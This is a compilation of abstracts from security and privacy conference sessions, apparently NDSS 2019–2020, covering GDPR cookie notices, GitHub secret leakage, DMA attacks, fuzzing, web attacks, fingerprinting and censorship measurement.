The European Union’s General Data Protection Regulation (GDPR) went into effect on May 25, 2018. Its privacy regulations apply to any service and company collecting or processing personal data in Europe. Many companies had to adjust their data handling processes, consent forms, and privacy policies to comply with the GDPR’s transparency requirements. We monitored this rare event by analyzing changes on popular websites in all 28 member states of the European Union. For each country, we periodically examined its 500 most popular websites – 6,579 in total – for the presence of and updates to their privacy policy between December 2017 and October 2018. While many websites already had privacy policies, we find that in some countries up to 15.7 % of websites added new privacy policies by May 25, 2018, resulting in 84.5 % of websites having privacy policies. 72.6 % of websites with existing privacy policies updated them close to the date. After May this positive development slowed down noticeably. Most visibly, 62.1 % of websites in Europe now display cookie consent notices, 16 % more than in January 2018. These notices inform users about a site’s cookie use and user tracking practices. We categorized all observed cookie consent notices and evaluated 28 common implementations with respect to their technical realization of cookie consent. Our analysis shows that core web security mechanisms such as the same-origin policy pose problems for the implementation of consent according to GDPR rules, and opting out of third-party cookies requires the third party to cooperate. Overall, we conclude that the web became more transparent at the time GDPR came into force, but there is still a lack of both functional and usable mechanisms for users to consent to or deny processing of their personal data on the Internet.

How Bad Can It Git? Characterizing Secret Leakage in Public GitHub Repositories

GitHub and similar platforms have made public collaborative development of software commonplace. However, a problem arises when this public code must manage authentication secrets, such as API keys or cryptographic secrets. These secrets must be kept private for security, yet common development practices like adding these secrets to code make accidental leakage frequent. In this paper, we present the first large-scale and longitudinal analysis of secret leakage on GitHub. We examine billions of files collected using two complementary approaches: a nearly six-month scan of real-time public GitHub commits and a public snapshot covering 13% of open-source repositories. We focus on private key files and 11 high-impact platforms with distinctive API key formats. This focus allows us to develop conservative detection techniques that we manually and automatically evaluate to ensure accurate results. We find that not only is secret leakage pervasive — affecting over 100,000 repositories— but that thousands of new, unique secrets are leaked every day. We also use our data to explore possible root causes of leakage and to evaluate potential mitigation strategies. This work shows that secret leakage on public repository platforms is rampant and far from a solved problem, placing developers and services at persistent risk of compromise and abuse.

DNS Cache-Based User Tracking

We describe a novel user tracking technique that is based on assigning statistically unique DNS records per user. This new tracking technique is unique in being able to distinguish between machines that have identical hardware and software, and track users even if they use “privacy mode” browsing, or use multiple browsers (on the same machine).
The technique overcomes issues related to the caching of DNS answers in resolvers, and utilizes per-device caching of DNS answers at the client. We experimentally demonstrate that it covers the technologies used by a very large fraction of Internet users (in terms of browsers, operating systems, and DNS resolution platforms).
Our technique can track users for up to a day (typically), and therefore works best when combined with other, narrower yet longer-lived techniques such as regular cookies - we briefly
explain how to combine such techniques.
We suggest mitigations to this tracking technique but note that it is not easily mitigated. There are possible workarounds, yet these are not without setup overhead, performance overhead or convenience overhead. A complete mitigation requires software modifications in both browsers and resolver software.

Quantity vs. Quality: Evaluating User Interest Profiles Using Ad Preference Managers

Widely reported privacy issues concerning major online advertising platforms (e.g., Facebook) have heightened concerns among users about the data that is collected about them. However, while we have a comprehensive understanding who collects data on users, as well as how tracking is implemented, there is still a significant gap in our understanding: what information do advertisers actually infer about users, and is this information accurate?

In this study, we leverage Ad Preference Managers (APMs) as a lens through which to address this gap. APMs are transparency tools offered by some advertising platforms that allow users to see the interest profiles that are constructed about them. We recruited 220 participants to install an IRB approved browser extension that collected their interest profiles from four APMs (Google, Facebook, Oracle BlueKai, and Neilsen eXelate), as well as behavioral and survey data. We use this data to analyze the size and correctness of interest profiles, compare their composition across the four platforms, and investigate the origins of the data underlying these profiles.

5A: Bugs and Vulnerabilities

Thunderclap: Exploring Vulnerabilities in Operating System IOMMU Protection via DMA from Untrustworthy Peripherals

Direct Memory Access (DMA) attacks have been known for many years: DMA-enabled I/O peripherals have complete access to the state of a computer and can fully compromise it including reading and writing all of system memory.

With the popularity of Thunderbolt 3 over USB Type-C and smart internal devices, opportunities for these attacks to be performed casually with only seconds of physical access to a computer have greatly broadened. In response, commodity hardware and operating-system (OS) vendors have incorporated support for Input-Output Memory Management Units (IOMMUs), which impose memory protection on DMA, and are widely believed to protect against DMA attacks.

We investigate the state-of-the-art in IOMMU protection across OSes using a novel I/O security research platform, and find that current protections fall short when faced with a functional network peripheral that uses its complex interactions with the OS for ill intent, and demonstrate compromises against macOS, FreeBSD, and Linux, which notionally utilize IOMMUs to protect against DMA attackers. Windows only uses the IOMMU in limited cases and remains vulnerable.

Using Thunderclap, an open-source FPGA research platform we built, we explore a number of novel exploit techniques to expose new classes of OS vulnerability. The complex vulnerability space for IOMMU-exposed shared memory available to DMA-enabled peripherals allows attackers to extract private data (sniffing cleartext VPN traffic) and hijack kernel control flow (launching a root shell) in seconds using devices such as USB-C projectors or power adapters.

We have worked closely with OS vendors to remedy these vulnerability classes, and they have now shipped substantial feature improvements and mitigations as a result of our work.

One Engine To Serve ‘em All: Inferring Taint Rules Without Architectural Semantics

Dynamic binary taint analysis has wide applications in the security analysis of commercial-off-the-shelf (COTS) binaries. One of the key challenges in dynamic binary analysis is to specify the taint rules that capture how taint information propagates for each instruction on an architecture. Most of the existing solutions specify taint rules using a deductive approach by summarizing the rules manually after analyzing the instruction semantics. Intuitively, taint propagation reflects on how an instruction input affects its output and thus can be observed from instruction executions. In this work, we propose an inductive method for taint propagation and develop a universal taint tracking engine that is architecture-agnostic. Our taint engine, TAINTINDUCE, can learn taint rules with minimal architectural knowledge by observing the execution behavior of instructions. To measure its correctness and guide taint rule generation, we define the precise notion of soundness for bit-level taint tracking in this novel setup. In our evaluation, we show that TAINT INDUCE automatically learns rules for 4 widely used architectures: x86, x64, AArch64, and MIPS-I. It can detect vulnerabilities for 24 CVEs in 15 applications on both Linux and Windows over millions of instructions and is comparable with other mature existing tools (TEMU [51], libdft [32], Triton [42]). TAINTINDUCE can be used as a standalone taint engine or be used to complement existing taint engines for unhandled instructions. Further, it can be used as a cross-referencing tool to uncover bugs in taint engines, emulation implementations and ISA documentations.

Automating Patching of Vulnerable Open-Source Software Versions in Application Binaries

Mobile application developers rely heavily on open-source software (OSS) to offload common functionalities such as the implementation of protocols and media format playback. Over the past years, several vulnerabilities have been found in popular open-source libraries like OpenSSL and FFmpeg. Mobile applications that include such libraries inherit these flaws, which make them vulnerable. Fortunately, the open-source community is responsive and patches are made available within days. However, mobile application developers are often left unaware of these flaws. The App Security Improvement Program (ASIP) is a commendable effort by Google to notify application developers of these flaws, but recent work has shown that many developers do not act on this information.

Our work addresses vulnerable mobile applications through automatic binary patching from source patches provided by the OSS maintainers and without involving the developers. We propose novel techniques to overcome difficult challenges like patching feasibility analysis, source-code-to-binary-code matching, and in-memory patching. Our technique uses a novel variability-aware approach, which we implement as OSSPatcher. We evaluated OSSPatcher with 39 OSS and a collection of 1,000 Android applications using their vulnerable versions. OSSPatcher generated 675 function-level patches that fixed the affected mobile applications without breaking their binary code. Further, we evaluated 10 vulnerabilities in popular apps such as Chrome with public exploits, which OSSPatcher was able to mitigate and thwart their exploitation.

CRCount: Pointer Invalidation with Reference Counting to Mitigate Use-after-free in Legacy C/C++

Pointer invalidation has been a popular approach adopted in many recent studies to mitigate use-after-free errors. The approach can be divided largely into two different schemes: explicit invalidation and implicit invalidation. The former aims to eradicate the root cause of use-after-free errors by invalidating every dangling pointer one by one explicitly. In contrast, the latter aims to prevent dangling pointers by freeing an object only if there is no pointer referring to it. A downside of the explicit scheme is that it is expensive, as it demands high-cost algorithms or a large amount of space to maintain every up-to-date list of pointer locations linking to each object at all times. Implicit invalidation is more efficient in that even without any explicit effort, it can eliminate dangling pointers by leaving objects undeleted until all the links between the objects and their referring pointers vanish by themselves during program execution. However, such an argument only holds if the scheme knows exactly when each link is created and deleted. Reference counting is a traditional method to determine the existence of reference links between objects and pointers. Unfortunately, impeccable reference counting for legacy C/C++ code is very difficult and expensive to achieve in practice, mainly because of the type unsafe operations in the code. In this paper, we present a solution, called CRCount, to the use-after-free problem in legacy C/C++. For effective and efficient problem solving, CRCount is armed with the pointer footprinting technique that enables us to compute, with high accuracy, the reference count of every object referred to by the pointers in the legacy code. Our experiments demonstrate that CRCount mitigates the use-after-free errors with a lower performance-wise and space-wise overhead than the existing pointer invalidation solutions.

CodeAlchemist: Semantics-Aware Code Generation to Find Vulnerabilities in JavaScript Engines

JavaScript engines are an attractive target for attackers due to their popularity and flexibility in building exploits. Current state-of-the-art fuzzers for finding JavaScript engine vulnerabilities focus mainly on generating syntactically correct test cases based on either a predefined context-free grammar or a trained probabilistic language model. Unfortunately, syntactically correct JavaScript sentences are often semantically invalid at runtime. Furthermore, statically analyzing the semantics of JavaScript code is challenging due to its dynamic nature: JavaScript code is generated at runtime, and JavaScript expressions are dynamically-typed. To address this challenge, we propose a novel test case generation algorithm that we call semantics-aware assembly, and implement it in a fuzz testing tool termed CodeAlchemist. Our tool can generate arbitrary JavaScript code snippets that are both semantically and syntactically correct, and it effectively yields test cases that can crash JavaScript engines. We found numerous vulnerabilities of the latest JavaScript engines with CodeAlchemist and reported them to the vendors.

6A: Authentication

Coconut: Threshold Issuance Selective Disclosure Credentials with Applications to Distributed Ledgers

Coconut is a novel selective disclosure credential scheme supporting distributed threshold issuance, public and private attributes, re-randomization, and multiple unlinkable selective attribute revelations. Coconut integrates with Blockchains to ensure confidentiality, authenticity and availability even when a subset of credential issuing authorities are malicious or offline. We implement and evaluate a generic Coconut smart contract library for Chainspace and Ethereum; and present three applications related to anonymous payments, electronic petitions, and distribution of proxies for censorship resistance.
Coconut uses short and computationally efficient credentials, and our evaluation shows that most Coconut cryptographic primitives take just a few milliseconds on average, with verification taking the longest time (10 milliseconds).

Distinguishing Attacks from Legitimate Authentication Traffic at Scale

Online guessing attacks against password servers can be hard to address. Approaches that throttle or block repeated guesses on an account (e.g., three strikes type lockout rules) can be effective against depth-first attacks, but are of little help against breadth-first attacks that spread guesses very widely. At large providers with tens or hundreds of millions of accounts breadth-first attacks offer a way to send millions or even billions of guesses without ever triggering the depth-first defenses. The absence of labels and non-stationarity of attack traffic make it challenging to apply machine learning techniques.

We show how to accurately estimate the odds that an observation $x$ associated with a request is malicious. Our main assumptions are that successful malicious logins are a small fraction of the total, and that the distribution of $x$ in the legitimate traffic is stationary, or very-slowly varying. From these we show how we can estimate the ratio of bad-to-good traffic among any set of requests; how we can then identify subsets of the request data that contain least (or even no) attack traffic; how these least-attacked subsets allow us to estimate the distribution of values of $x$ over the legitimate data, and hence calculate the odds ratio. A sensitivity analysis shows that even when we fail to identify a subset with little attack traffic our odds ratio estimates are very robust.

Robust Performance Metrics for Authentication Systems

Research has produced many types of authentication systems that use machine learning. However, there is no consistent approach for reporting performance metrics and the reported metrics are inadequate. In this work, we show that several of the common metrics used for reporting performance, such as maximum accuracy (ACC), equal error rate (EER) and area under the ROC curve (AUROC), are inherently flawed. These common metrics hide the details of the inherent trade-offs a system must make when implemented. Our findings show that current metrics give no insight into how system performance degrades outside the ideal conditions in which they were designed. We argue that adequate performance reporting must be provided to enable meaningful evaluation and that current, commonly used approaches fail in this regard. We present the unnormalized frequency count of scores (FCS) to demonstrate the mathematical underpinnings that lead to these failures and show how they can be avoided. The FCS can be used to augment the performance reporting to enable comparison across systems in a visual way. When reported with the Receiver Operating Characteristics curve (ROC), these two metrics provide a solution to the limitations of currently reported metrics. Finally, we show how to use the FCS and ROC metrics to evaluate and compare different authentication systems.

Total Recall: Persistence of Passwords in Android

A good security practice for handling sensitive data, such as passwords, is to overwrite the data buffers with zeros once the data is no longer in use. This protects against attackers who gain a snapshot of a device’s physical memory, whether by in-person physical attacks, or by remote attacks like Meltdown and Spectre. This paper looks at unnecessary password retention in Android phones by popular apps, secure password management apps, and even the lockscreen system process. We have performed a comprehensive analysis of the Android framework and a variety of apps, and discovered that passwords can survive in a variety of locations, including UI widgets where users enter their passwords, apps that retain passwords rather than exchange them for tokens, old copies not yet reused by garbage collectors, and buffers in keyboard apps. We have developed solutions that successfully fix these problems with modest code changes.

How to End Password Reuse on the Web

We present a framework by which websites can coordinate to make it difficult for users to set similar passwords at these websites, in an effort to break the culture of password reuse on the web today.
Though the design of such a framework is fraught with risks to users’ security and privacy, we show that these risks can be effectively mitigated through careful scoping of the goals for such a framework and through principled design. At the core of our framework is a private set-membership-test protocol that enables one website to determine, upon a user setting a password for use at it, whether that user has already set a similar password at another participating website, but with neither side disclosing to the other the password(s) it employs in the protocol. Our framework then layers over this protocol a collection of techniques to mitigate the leakage necessitated by such a test. We verify via probabilistic model checking that these techniques are effective in maintaining account security, and since these mechanisms are consistent with common user experience today, our framework should be unobtrusive to users who do not reuse similar passwords across websites (e.g., due to having adopted a password manager). Through a working implementation of our framework and optimization of its parameters based on insights of how passwords tend to be reused, we show that our design can meet the scalability challenges facing such a service.

11: Machine Learning & Game Theory Applications

Graph-based Security and Privacy Analytics via Collective Classification with Joint Weight Learning and Propagation

Many security and privacy problems can be modeled as a graph classification problem, where nodes in the graph are classified by collective classification simultaneously. State- of-the-art collective classification methods for such graph-based security and privacy analytics follow the following paradigm: assign weights to edges of the graph, iteratively propagate reputation scores of nodes among the weighted graph, and use the final reputation scores to classify nodes in the graph. The key challenge is to assign edge weights such that an edge has a large weight if the two corresponding nodes have the same label, and a small weight otherwise. Although collective classification has been studied and applied for security and privacy problems for more than a decade, how to address this challenge is still an open question. For instance, most existing methods simply set a constant weight to all edges.

In this work, we propose a novel collective classification framework to address this long-standing challenge. We first formulate learning edge weights as an optimization problem, which quantifies the goals about the final reputation scores that we aim to achieve. However, it is computationally hard to solve the optimization problem because the final reputation scores depend on the edge weights in a very complex way. To address the computational challenge, we propose to jointly learn the edge weights and propagate the reputation scores, which is essentially an approximate solution to the optimization problem. We compare our framework with state-of-the-art methods for graph-based security and privacy analytics using four large-scale real-world datasets from various application scenarios such as Sybil detection in social networks, fake review detection in Yelp, and attribute inference attacks. Our results demonstrate that our framework achieves higher accuracies than state-of-the-art methods with an acceptable computational overhead.

Enemy At the Gateways: Censorship-Resilient Proxy Distribution Using Game Theory

A core technique used by popular proxy-based circumvention systems like Tor is to privately and selectively distribute the IP addresses of circumvention proxies among censored clients to keep them unknown to the censors.

In Tor, for instance, such privately shared proxies are known as bridges. A key challenge to this mechanism is the insider attack problem: censoring agents can impersonate benign censored clients in order to learn (and then block) the privately shared circumvention proxies. To minimize the risks of the insider attack threat, in-the-wild circumvention systems like Tor use various proxy assignment mechanisms in order to minimize the risk of proxy enumeration by the censors, while providing access to a large fraction of censored clients.

Unfortunately, existing proxy assignment mechanisms (like the one used by Tor) are based on ad hoc heuristics that offer no theoretical guarantees and are easily evaded in practice. In this paper, we take a systematic approach to the problem of proxy distribution in circumvention systems by establishing a game-theoretic framework. We model the proxy assignment problem as a game between circumvention system operators and the censors, and use game theory to derive the optimal strategies of each of the parties. Using our framework, we derive the best (optimal) proxy assignment mechanism of a circumvention system like Tor in the presence of the strongest censorship adversary who takes her best censorship actions.

We perform extensive simulations to evaluate our optimal proxy assignment algorithm under various adversarial and network settings. We show that the algorithm has superior performance compared to the state of the art, i.e., provides stronger resistance to censorship even against the strongest censorship adversary. Our study establishes a generic framework for optimal proxy assignment that can be applied to various types of circumvention systems and under various threat models. We conclude with lessons and recommendations for the design of proxy-based circumvention systems.

Neuro-Symbolic Execution: Augmenting Symbolic Execution with Neural Constraints

Symbolic execution is a powerful technique for program analysis. However, it has many limitations in practical applicability: the path explosion problem encumbers scalability, the need for language-specific implementation, the inability to handle complex dependencies, and the limited expressiveness of theories supported by underlying satisfiability checkers. Often, relationships between variables of interest are not expressible directly as purely symbolic constraints. To this end, we present a new approach—neuro-symbolic execution—which learns an approximation of the relationship between program values of interest, as a neural network. We develop a procedure for checking satisfiability of mixed constraints, involving both symbolic expressions and neural representations. We implement our new approach in a tool called NeuEx as an extension of KLEE, a state-of-the-art dynamic symbolic execution engine. NeuEx finds 33 exploits in a benchmark of 7 programs within 12 hours. This is an improvement in the bug finding efficacy of 94% over vanilla KLEE. We show that this new approach drives execution down difficult paths on which KLEE and other DSE extensions get stuck, eliminating limitations of purely SMT-based techniques.

Neural Machine Translation Inspired Binary Code Similarity Comparison beyond Function Pairs

Binary code analysis allows analyzing binary code without having access to the corresponding source code. It is widely used for vulnerability discovery, malware dissection, attack investigation, etc. A binary, after disassembly, is expressed in an assembly language. This inspires us to approach binary analysis by leveraging ideas and techniques from Natural Language Processing (NLP), a rich area focused on processing text of various natural languages. We notice that binary code analysis and NLP share a lot of analogical topics, such as semantics extraction, summarization, and classification. This work utilizes these ideas to address two important code similarity comparison problems. (I) Given a pair of basic blocks for different
instruction set architectures, determining whether their semantics is similar or not; and (II) given a piece of code of interest, determining if it is contained in another piece of assembly code from a different architecture. The solutions to these two problems have many applications, such as cross-architecture code plagiarism detection, malware identification, and vulnerability discovery.

Despite the evident importance of Problem I, existing solutions are either inefficient or imprecise. Inspired by Neural Machine Translation (NMT), which is a new approach that tackles text across natural languages very well, we regard instructions as words and basic blocks as sentences, and propose a novel cross-(assembly)-lingual deep learning approach to solving the first problem, attaining high efficiency and precision. Regarding Problem II, many solutions have been proposed recently to solve this issue at the function level. However, performing cross-architecture code similarity comparison beyond function pairs is a new and more challenging endeavor. Employing our technique for cross-architecture basic-block comparison, we propose an effective solution to Problem II. We implement a prototype system and perform a comprehensive evaluation. A comparison between our approach and existing approaches to Problem I shows that our system outperforms them in terms of accuracy, efficiency and scalability. And the case studies utilizing the system demonstrate that our solution to Problem II is effective. Moreover, this research showcases how to apply ideas and techniques from NLP to large-scale binary code analysis.

2020 Programme dblp

Session 1A: Web

FUSE: Finding File Upload Bugs via Penetration Testing ✔👍

An Unrestricted File Upload (UFU) vulnerability is a critical security threat that enables an adversary to upload her choice of a forged file to a target web server. This bug evolves into an Unrestricted Executable File Upload (UEFU) vulnerability when the adversary is able to conduct remote code execution of the uploaded file via triggering its URL. We design and implement FUSE, the first penetration testing tool designed to discover UFU and UEFU vulnerabilities in server-side PHP web applications. The goal of FUSE is to generate upload requests; each request becomes an exploit payload that triggers a UFU or UEFU vulnerability. However, this approach entails two technical challenges: (1) it should generate an upload request that bypasses all content-filtering checks present in a target web application; and (2) it should preserve the execution semantic of the resulting uploaded file. We address these technical challenges by mutating standard upload requests with carefully designed mutation operations that enable the bypassing of content- filtering checks and do not tamper with the execution of uploaded files. FUSE discovered 30 previously unreported UEFU vulnerabilities, including 15 CVEs from 33 real-world web applications, thereby demonstrating its efficacy in finding code execution bugs via file uploads.

Melting Pot of Origins: Compromising the Intermediary Web Services that Rehost Websites

Intermediary web services such as web proxies, web translators, and web archives have become pervasive as a means to enhance the openness of the web. These services aim to remove the intrinsic obstacles to web access; i.e., access blocking, language barriers, and missing web pages. In this study, we refer to these services as web rehosting services and make the first exploration of their security flaws. The web rehosting services use a single domain name to rehost several websites that have distinct domain names; this characteristic makes web rehosting services intrinsically vulnerable to violating the same origin policy if not operated carefully. Based on the intrinsic vulnerability of web rehosting services, we demonstrate that an attacker can perform five different types of attacks that target users who make use of web rehosting services: persistent man-in-the-middle attack, abusing privileges to access various resources, stealing credentials, stealing browser history, and session hijacking/injection. Our extensive analysis of 21 popular web rehosting services, which have more than 200 million visits per day, revealed that these attacks are feasible. In response to this observation, we provide effective countermeasures against each type of attack.

Social media has become a primary mean of content and information sharing, thanks to its speed and simplicity. In this scenario, link previews play the important role of giving a meaningful first glance to users, summarizing the content of the shared webpage within its title, description and image. In our work, we analyzed the preview-rendering process, observing how it is possible to misuse it to obtain benign-looking previews for malicious links. Concrete use-case of this research field is phishing and spam spread, considering targeted attacks in addition to large-scale campaigns.

We designed a set of experiments for 20 social media platforms including social networks and instant messenger applications and found out how most of the platforms follow their own preview design and format, sometimes providing partial information. Four of these platforms allow preview crafting so as to hide the malicious target even to a tech-savvy user, and we found that it is possible to create misleading previews for the remaining 16 platforms when an attacker can register their own domain. We also observe how 18 social media platforms do not employ active nor passive countermeasures against the spread of known malicious links or software, and that existing cross-checks on malicious URLs can be bypassed through client- and server-side redirections. To conclude, we suggest seven recommendations covering the spectrum of our findings, to improve the overall preview-rendering mechanism and increase users’ overall trust in social media platforms.

Cross-Origin State Inference (COSI) Attacks: Leaking Web Site States through XS-Leaks

In a Cross-Origin State Inference (COSI) attack, an attacker convinces a victim into visiting an attack web page, which leverages the cross-origin interaction features of the victim’s web browser to infer the victim’s state at a target web site. Multiple instances of COSI attacks have been found in the past under different names such as login detection or access detection attacks. But, those attacks only consider two states (e.g., logged in or not) and focus on a specific browser leak method (or XS-Leak).

This work shows that mounting more complex COSI attacks such as deanonymizing the owner of an account, determining if the victim owns sensitive content, and determining the victim’s account type often requires considering more than two states. Furthermore, robust attacks require supporting a variety of browsers since the victim’s browser cannot be predicted apriori. To address these issues, we present a novel approach to identify and build complex COSI attacks that differentiate more than
two states and support multiple browsers by combining multiple attack vectors, possibly using different XS-Leaks. To enable our approach, we introduce the concept of a COSI attack class. We propose two novel techniques to generalize existing COSI attack instances into COSI attack classes and to discover new COSI attack classes. We systematically study existing attacks and apply our techniques to them, identifying 40 COSI attack classes. As part of this process, we discover a novel XS-Leak based on window.postMessage. We implement our approach into Basta-COSI, a tool to find COSI attacks in a target web site. We apply Basta-COSI to test four stand-alone web applications and 58 popular web sites, finding COSI attacks against each of them.

Carnus: Exploring the Privacy Threats of Browser Extension Fingerprinting

With users becoming increasingly privacy-aware and browser vendors incorporating anti-tracking mechanisms, browser fingerprinting has garnered significant attention. Accordingly, prior work has proposed techniques for identifying browser extensions and using them as part of a device’s fingerprint. While previous studies have demonstrated how extensions can be detected through their web accessible resources, there exists a significant gap regarding techniques that indirectly detect extensions through behavioral artifacts. In fact, no prior study has demonstrated that this can be done in an automated fashion. In this paper, we bridge this gap by presenting the first fully automated creation and detection of behavior-based extension fingerprints. We also introduce two novel fingerprinting techniques that monitor extensions’ communication patterns, namely outgoing HTTP requests and intra-browser message exchanges. These techniques comprise the core of Carnus, a modular system for the static and dynamic analysis of extensions, which we use to create the largest set of extension fingerprints to date. We leverage our dataset of 29,428 detectable extensions to conduct a comprehensive investigation of extension fingerprinting in realistic settings and demonstrate the practicality of our attack. Our experimental evaluation against a state-of-the-art countermeasure confirms the robustness of our techniques as 87.92% of our behavior-based fingerprints remain effective.

Subsequently, we aim to explore the true extent of the privacy threat that extension fingerprinting poses to users, and present a novel study on the feasibility of inference attacks that reveal private and sensitive user information based on the functionality and nature of their extensions. We first collect over 1.44 million public user reviews of our detectable extensions, which provide a unique macroscopic view of the browser extension ecosystem and enable a more precise evaluation of the discriminatory power of extensions as well as a new deanonymization vector. We also automatically categorize extensions based on the developers’ descriptions and identify those that can lead to the inference of personal data (religion, medical issues, etc.). Overall, our research sheds light on previously unexplored dimensions of the privacy threats of extension fingerprinting and highlights the need for more effective countermeasures that can prevent our attacks.

Session 1B: Fuzzing

HYPER-CUBE: High-Dimensional Hypervisor Fuzzing

Applying modern fuzzers to novel targets is often a very lucrative venture. Hypervisors are part of a very critical code base: compromising them could allow an attacker to compromise the whole cloud infrastructure of any cloud provider. In this paper, we build a novel fuzzer that aims explicitly at testing modern hypervisors.
Our high throughput fuzzer design for long running interactive targets allows us to fuzz a large number of hypervisors, both open source, and proprietary. In contrast to one-dimensional fuzzers such as AFL, HYPER-CUBE can interact with any number of interfaces in any order.

Our evaluation shows that we can find more bugs (over 2x) and coverage (as much as 2x) than state of the art hypervisor fuzzers. Additionally, in most cases, we were able to do so using multiple orders of magnitude less time than comparable fuzzers. HYPER-CUBE was also able to rediscover a set of well-known vulnerabilities for hypervisors, such as VENOM, in less than five minutes. In total, HYPER-CUBE found 54 novel bugs, and so far we obtained 37 CVEs.
Our evaluation results demonstrates that next generation coverage-guided fuzzers should incorporate a higher-throughput design for long running targets such as hypervisors.

HFL: Hybrid Fuzzing on the Linux Kernel

Hybrid fuzzing, combining symbolic execution and fuzzing, is a promising approach for vulnerability discovery because each approach can complement the other. However, we observe that applying hybrid fuzzing to kernel testing is challenging because the following unique characteristics of the kernel make a naive adoption of hybrid fuzzing inefficient: 1) having many implicit control transfers determined by syscall arguments, 2) controlling and matching internal system state via system calls, and 3) inferring nested argument type for invoking system calls. Failure to handling such challenges will render both fuzzing and symbolic execution inefficient, and thereby, will result in an inefficient hybrid fuzzing. Although these challenges are essential to both fuzzing and symbolic execution, however, to the best of our knowledge, existing kernel testing approaches either naively use each technique separately without handling such challenges or imprecisely handle a part of challenges only by static analysis.

To this end, this paper proposes HFL, which not only combines fuzzing with symbolic execution for hybrid fuzzing but also addresses kernel-specific fuzzing challenges via three distinct features: 1) converting implicit control transfers to explicit transfers, 2) inferring system call sequence to build a consistent system state, and 3) identifying nested arguments types of system calls. As a result, HFL found 24 previously unknown vulnerabilities in recent Linux kernels. Additionally, HFL achieves 14% higher code coverage than Syzkaller, and over S2E/TriforceAFL, achieving even eight times better coverage, using the same amount of resource (CPU, time, etc.). Regarding vulnerability discovery performance, HFL found 13 known vulnerabilities more than three times faster than Syzkaller.

HotFuzz: Discovering Algorithmic Denial-of-Service Vulnerabilities Through Guided Micro-Fuzzing

Fifteen billion devices run Java and many of them are connected to the Internet. As this ecosystem continues to grow, it remains an important task to discover the unknown security threats these devices face. Fuzz testing repeatedly runs software on random inputs in order to trigger unexpected program behaviors, such as crashes or timeouts, and has historically revealed serious security vulnerabilities. Contemporary fuzz testing techniques focus on identifying memory corruption vulnerabilities that allow adversaries to achieve remote code execution. Meanwhile, algorithmic complexity (AC) vulnerabilities, which are a common attack vector for denial-of-service attacks, remain an understudied threat.

In this paper, we present HotFuzz, a framework for automatically discovering AC vulnerabilities in Java libraries. HotFuzz uses micro-fuzzing, a genetic algorithm that evolves arbitrary Java objects in order to trigger the worst-case performance for a method under test. We define Small Recursive Instantiation (SRI) which provides seed inputs to micro-fuzzing represented as Java objects. After micro-fuzzing, HotFuzz synthesizes test cases that triggered AC vulnerabilities into Java programs and monitors their execution in order to reproduce vulnerabilities outside the analysis framework. HotFuzz outputs those programs that exhibit high CPU utilization as witnesses for AC vulnerabilities in a Java library.

We evaluate HotFuzz over the Java Runtime Environment (JRE), the 100 most popular Java libraries on Maven, and challenges contained in the DARPA Space and Time Analysis for Cyber-Security (STAC) program. We compare the effectiveness of using seed inputs derived using SRI against using empty values. In this evaluation, we verified known AC vulnerabilities, discovered previously unknown AC vulnerabilities that we responsibly reported to vendors, and received confirmation from both IBM and Oracle. Our results demonstrate micro-fuzzing finds AC vulnerabilities in real-world software, and that micro-fuzzing with SRI derived seed inputs complements using empty seed inputs.

Not All Coverage Measurements Are Equal: Fuzzing by Coverage Accounting for Input Prioritization

Coverage-based fuzzing has been actively studied and widely adopted for finding vulnerabilities in real-world software applications. With code coverage, such as statement coverage and transition coverage, as the guidance of input mutation, coverage-based fuzzing can generate inputs that cover more code and thus find more vulnerabilities without prerequisite information such as input format. Current coverage-based fuzzing tools treat covered code equally. All inputs that contribute to new statements or transitions are kept for future mutation no matter what the statements or transitions are and how much they impact security. Although this design is reasonable from the perspective of software testing, which aims to full code coverage, it is inefficient for vulnerability discovery since that 1) current techniques are still inadequate to reach full coverage within a reasonable amount of time, and that 2) we always want to discover vulnerabilities early so that it can be patched promptly. Even worse, due to the non-discriminative code coverage treatment, current fuzzing tools suffer from recent anti-fuzzing techniques and become much less effective in finding real-world vulnerabilities.

To resolve the issue, we propose coverage accounting, an innovative approach that evaluates code coverage by security impacts. Based on the proposed metrics, we design a new scheme to prioritize fuzzing inputs and develop TortoiseFuzz, a greybox fuzzer for memory corruption vulnerabilities. We evaluated TortoiseFuzz on 30 real-world applications and compared it with 5 state-of-the-art greybox and hybrid fuzzers (AFL, AFLFast, FairFuzz, QSYM, and Angora). TortoiseFuzz outperformed all greybox fuzzers and most hybrid fuzzers. It also had comparative results for other hybrid fuzzers yet consumed much fewer resources. Additionally, TortoiseFuzz found 18 new real-world vulnerabilities and has got 8 new CVEs so far. We will open source TortoiseFuzz to foster future research.

Session 2A: Censorship

Detecting Probe-resistant Proxies

Censorship circumvention proxies have to resist active probing attempts, where censors connect to suspected servers and attempt to communicate using known proxy protocols. If the server responds in a way that reveals it is a proxy, the censor can block it with minimal collateral risk to other non-proxy services. Censors such as the Great Firewall of China have previously been observed using basic forms of this technique to find and block proxy servers as soon as they are used. In response, circumventors have created new “probe-resistant” proxy protocols, including obfs4, Shadowsocks, and Lampshade, that attempt to prevent censors from discovering them. These proxies require knowledge of a secret in order to use, and the servers remain silent when probed by a censor that doesn’t have the secret in an attempt to make it more difficult for censors to detect them.

In this paper, we identify ways that censors can still distinguish such probe-resistant proxies from other innocuous hosts on the Internet, despite their design. We discover unique TCP behaviors of five probe-resistant protocols used in popular circumvention software that could allow censors to effectively confirm suspected proxies with minimal false positives. We evaluate and analyze our attacks on hundreds of thousands of servers collected from a 10 Gbps university ISP vantage point over several days as well as active scanning using ZMap. We find that our attacks are able to efficiently identify proxy servers with only a handful of probing connections, with negligible false positives. Using our datasets, we also suggest defenses to these attacks that make it harder for censors to distinguish proxies from other common servers, and we work with proxy developers to implement these changes in several popular circumvention tools.

Decentralized Control: A Case Study of Russia

Until now, censorship research has largely focused on highly centralized networks that rely on government-run technical choke-points, such as the Great Firewall of China. Although it was previously thought to be prohibitively difficult, large-scale censorship in decentralized networks are on the rise. Our in-depth investigation of the mechanisms underlying decentralized information control in Russia shows that such large-scale censorship can be achieved in decentralized networks through inexpensive commodity equipment. This new form of information control presents a host of problems for censorship measurement, including difficulty identifying censored content, requiring measurements from diverse perspectives, and variegated censorship mechanisms that require significant effort to identify in a robust manner.

By working with activists on the ground in Russia, we obtained five leaked blocklists signed by Roskomnadzor, the Russian government’s federal service for mass communications, along with seven years of historical blocklist data. This authoritative list contains domains, IPs, and subnets that ISPs have been required to block since November 1st, 2012. We used the blocklist from April 24 2019, that contains 132,798 domains, 324,695 IPs, and 39 subnets, to collect active measurement data from residential, data center and infrastructural vantage points. Our vantage points span 408 unique ASes that control ~ 65% of Russian IP address space.

